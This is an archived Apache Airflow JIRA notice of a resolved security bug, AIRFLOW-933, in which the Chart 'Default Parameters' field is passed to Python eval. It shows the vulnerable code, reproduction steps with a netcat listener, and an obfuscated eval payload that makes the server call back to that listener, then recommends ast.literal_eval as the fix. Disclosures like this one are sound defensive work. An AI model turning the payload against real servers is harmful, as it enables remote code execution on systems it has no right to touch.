You are viewing a plain text version of this content. The canonical link for it is here.

Posted to commits@airflow.apache.org by "Bolke de Bruin (JIRA)" <ji...@apache.org> on 2017/03/14 19:28:41 UTC

[jira] [Resolved] (AIRFLOW-933) Security - Airflow Use of Eval Allows for Remote Code Execution

     [ https://issues.apache.org/jira/browse/AIRFLOW-933?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Bolke de Bruin resolved AIRFLOW-933.
------------------------------------
       Resolution: Fixed
    Fix Version/s: 1.8.0

> Security - Airflow Use of Eval Allows for Remote Code Execution
> ---------------------------------------------------------------
>
>                 Key: AIRFLOW-933
>                 URL: https://issues.apache.org/jira/browse/AIRFLOW-933
>             Project: Apache Airflow
>          Issue Type: Bug
>            Reporter: Rui Wang
>            Assignee: Rui Wang
>             Fix For: 1.8.0
>
>
> mpact: Any user with the ability to create or edit Charts may execute arbitrary code on the Airflow server.
> Location: The Default Parameters form eld sent when saving a Chart located at /admin/chart/new/
> Description: The Chart functionality allows for the definition of Default Parameters, which are baseline constraints for the values within a chart.
> This data is user-controllable and passed directly to a Python eval, which will execute code:
> {code}
> def label_link(v, c, m, p): 
>   try:
>     default_params = eval(m.default_params) 
>   except:
>     default_params = {} 
>   url = url_for(
>     'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
>     **default_params)
>   return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))
> {code}
> Reproduction Steps:
> 1. Configure a local instance of Airflow, and start a local netcat listener with the following shell command: nc -l 1337.
> 2. Access Airflow as a user able to create or edit Charts.
> 3. Browse to /admin/chart/new to bring-up the UI for creating a Chart.
> 4. In its Default Parameters field, and enter-in the following example payload:
>   (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (), None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, __g))]][0])(globals())
> 5. Save the Chart, and observe that the application has made a network request to your listener, indicating that your code has executed.
> Remediation: Use the Python method ast.literal_eval (https://docs.python.org/3/library/ast.html#ast.literal_eval) which safely parses its input, rather than executing it as code.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)